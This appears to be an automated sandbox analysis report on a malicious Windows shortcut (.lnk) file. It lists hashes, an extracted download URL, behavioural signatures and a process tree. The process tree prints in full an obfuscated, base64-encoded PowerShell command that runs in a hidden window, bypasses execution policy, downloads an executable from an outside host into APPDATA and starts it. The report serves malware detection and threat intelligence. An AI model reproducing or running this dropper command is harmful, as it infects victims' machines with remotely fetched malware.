Analysis
-
max time kernel
13s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20/09/2024, 05:21
Static task
static1
Behavioral task
behavioral1
Sample
5213706677228235947485/52137066772282356147846598.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
5213706677228235947485/52137066772282356147846598.lnk
Resource
win10v2004-20240802-en
General
-
Target
5213706677228235947485/52137066772282356147846598.lnk
-
Size
4KB
-
MD5
dc6cd3c09e2d75ef5f1df84472e9b4c4
-
SHA1
bc79598890a4e39720d32aaaaa803eecf1bba3e3
-
SHA256
0e85ba9b3fdcc615705fff18bdb7cafad1c99a5378f3f3518c3edc8f3d8cd805
-
SHA512
7b651dc4a8f73b8bbf5230f754f428540ee4d8b6817a85491c5149ce762bd53288d0ed727c439561455c7f5ab1b66891cd5cb291b2e940f460377e44ce3c6a28
-
SSDEEP
48:8YFAISNc2ca6rDbakVfmrhpNoVOLYYqXgP7Jiu0GCWUljXZYocIPw7ikOUqIIPwq:8u0c243VWlLVqX67cuiJp1hPwitPw2
Malware Config
Extracted
http://adrianecolburn.com/download/md2.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2324 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2324 powershell.exe -
Hide Artifacts: Hidden Window 1 TTPs 1 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
pid Process 2956 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2324 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2324 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 524 wrote to memory of 2956 524 cmd.exe 31 PID 524 wrote to memory of 2956 524 cmd.exe 31 PID 524 wrote to memory of 2956 524 cmd.exe 31 PID 2956 wrote to memory of 2324 2956 cmd.exe 32 PID 2956 wrote to memory of 2324 2956 cmd.exe 32 PID 2956 wrote to memory of 2324 2956 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\5213706677228235947485\52137066772282356147846598.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:524 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c Powershell.exe -WindowStyle Hidden -enc UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgACAAIAAtAG4AbwBwAHIAbwBmAGkAbABlACAALQBjAG8AbQBtAGEAbgBkACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBhAGQAcgBpAGEAbgBlAGMAbwBsAGIAdQByAG4ALgBjAG8AbQAvAGQAbwB3AG4AbABvAGEAZAAvAG0AZAAyAC4AcABoAHAAIgAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABNAEQAMQA2ADMAMAAzADEALgBlAHgAZQAiACkAOwBOAGUAdwAtAEkAdABlAG0AIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAYQAiACAALQB0AHkAcABlACAAZgBpAGwAZQAgAC0AZgBvAHIAYwBlACAALQB2AGEAbAB1AGUAIAAiAEYANAAwADYARAA2ADAAMQAwAEQAMABEADAAOQAwAEMARAAzAEMAOABDADgAMABCAEYAQQAxADAAQwA3ADAAMAAwADIAMABEADAAMQAwAEUARgBCADAARQAwAEMARgBFADAAQgBGAEMAMAA4ADAANwAwAEQARgBFADAANwAwAEQAQwA3AEYAQwAwADgAMAA2AEMAOAAwAEIAMAA4ADAAMABGAEUAMABCADAAMgAwADgAMAA3ADAAMgAwADAAMABFADAARAAwADIAQwA4AEYARABGAEEAMABDADAAMQBDAEIAQwA4ADAANgBGAEEAMABDADAARABGAEUAMABCAEMAOAAwADYAMAA4ADAAQwBGAEQAMAAxADAAMwAwADQARgBGADAAMgBDADcARgBDAEYAQQBGAEIARAA2ADAANgBGADYARgA0AEYAQQBEADYAQwBBAEQANgBGAEEARgA2AEIAOQBGADQARgBEAEQANgBFADkARABFAEUAMgBGADEARQAyAEUANgBEADYARgBEAEYANgBGADQAMABEAEQANgBEAEMARgAxAEMANgBFADIARQA3AEQARgBEAEUARABDAEUARABDADkAQwBBAEQANgAwAEQARgA2ACIAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAE0ARAAxADYAMwAwADMAMQAuAGUAeABlADsA2⤵
- Hide Artifacts: Hidden Window
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell.exe -WindowStyle Hidden -enc UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgACAAIAAtAG4AbwBwAHIAbwBmAGkAbABlACAALQBjAG8AbQBtAGEAbgBkACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBhAGQAcgBpAGEAbgBlAGMAbwBsAGIAdQByAG4ALgBjAG8AbQAvAGQAbwB3AG4AbABvAGEAZAAvAG0AZAAyAC4AcABoAHAAIgAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABNAEQAMQA2ADMAMAAzADEALgBlAHgAZQAiACkAOwBOAGUAdwAtAEkAdABlAG0AIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAYQAiACAALQB0AHkAcABlACAAZgBpAGwAZQAgAC0AZgBvAHIAYwBlACAALQB2AGEAbAB1AGUAIAAiAEYANAAwADYARAA2ADAAMQAwAEQAMABEADAAOQAwAEMARAAzAEMAOABDADgAMABCAEYAQQAxADAAQwA3ADAAMAAwADIAMABEADAAMQAwAEUARgBCADAARQAwAEMARgBFADAAQgBGAEMAMAA4ADAANwAwAEQARgBFADAANwAwAEQAQwA3AEYAQwAwADgAMAA2AEMAOAAwAEIAMAA4ADAAMABGAEUAMABCADAAMgAwADgAMAA3ADAAMgAwADAAMABFADAARAAwADIAQwA4AEYARABGAEEAMABDADAAMQBDAEIAQwA4ADAANgBGAEEAMABDADAARABGAEUAMABCAEMAOAAwADYAMAA4ADAAQwBGAEQAMAAxADAAMwAwADQARgBGADAAMgBDADcARgBDAEYAQQBGAEIARAA2ADAANgBGADYARgA0AEYAQQBEADYAQwBBAEQANgBGAEEARgA2AEIAOQBGADQARgBEAEQANgBFADkARABFAEUAMgBGADEARQAyAEUANgBEADYARgBEAEYANgBGADQAMABEAEQANgBEAEMARgAxAEMANgBFADIARQA3AEQARgBEAEUARABDAEUARABDADkAQwBBAEQANgAwAEQARgA2ACIAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAE0ARAAxADYAMwAwADMAMQAuAGUAeABlADsA3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2324
-
-